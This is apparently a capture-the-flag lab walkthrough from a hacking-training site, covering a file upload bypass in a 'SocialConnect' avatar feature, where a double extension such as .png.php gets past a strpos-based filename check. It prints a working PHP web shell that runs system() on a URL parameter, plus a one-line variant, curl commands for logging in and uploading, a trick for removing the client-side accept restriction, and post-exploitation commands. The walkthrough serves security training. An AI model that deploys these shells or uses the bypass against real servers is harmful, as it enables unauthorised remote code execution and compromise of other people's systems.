Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
The SocialConnect platform has a flawed file validation mechanism in the avatar upload functionality. The code checks if the filename contains .png or .jpg anywhere in the name, rather than checking if it ends with these extensions. This allows double extensions like .png.php or .jpg.php to bypass the filter.
<target-ip>
to access SocialConnectshell.png.php
<?php
if(isset($_GET['cmd'])) {
echo "<pre>";
echo "Command: " . htmlspecialchars($_GET['cmd']) . "\n";
echo "Output:\n";
system($_GET['cmd']);
echo "</pre>";
} else {
echo "<h2>Web Shell Active</h2>";
echo "<p>Add ?cmd=COMMAND to execute commands</p>";
echo "<p>Example: ?cmd=cat /home/flag.txt</p>";
echo "<form method='GET'>";
echo "Command: <input type='text' name='cmd' placeholder='cat /home/flag.txt'>";
echo "<input type='submit' value='Execute'>";
echo "</form>";
}
?>
avatar.jpg.php
or similar double extensionsThe file input has client-side restrictions: accept=".png,.jpg,.jpeg"
. You need to bypass this to select your .php file.
accept
attribute:# Original
<input type="file" class="form-control" id="avatar" name="avatar" accept=".png,.jpg,.jpeg" required="">
# Modified (remove accept attribute)
<input type="file" class="form-control" id="avatar" name="avatar" required="">
shell.png.php
fileshell.png.php
to shell.png
shell.png.php
# First, login and get session cookie
curl -c cookies.txt -d "username=youruser&password=yourpass" -X POST <target-ip>/login.php
# Upload the shell directly
curl -b cookies.txt -F "avatar=@shell.png.php" <target-ip>/profile.php
shell.png.php
fileavatar_1_1234567890_shell.png.php
<target-ip>/uploads/avatars/
cat /home/flag.txt
# Direct flag read
cat /home/flag.txt
# Search for flag files
find / -name "*flag*" 2>/dev/null
# List home directory
ls -la /home/
# Current directory and permissions
pwd && whoami
b14691a4-8b7f-4eb2-b1c8-8e9c53e36ffa
shell.jpg.php
avatar.png.php
image.jpeg.php
profile.jpg.php5
Filename: cmd.png.php
Content:
<?php system($_GET['c']); ?>
Usage: cmd.png.php?c=cat /home/flag.txt
The vulnerable code in profile.php:
$allowedExtensions = ['png', 'jpg', 'jpeg'];
$hasValidExtension = false;
foreach ($allowedExtensions as $ext) {
if (strpos(strtolower($fileName), '.' . $ext) !== false) {
$hasValidExtension = true;
break;
}
}
The flaw: strpos()
checks if .png/.jpg appears anywhere in the filename, not just at the end. This allows files like 'shell.png.php' to pass validation.
This file upload bypass challenge demonstrates a common but critical vulnerability in web applications. By exploiting inadequate file validation, attackers can upload web shells and gain remote code execution capabilities. The double extension technique shown here is frequently encountered in real-world penetration testing scenarios and highlights the importance of implementing robust file upload security measures.
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.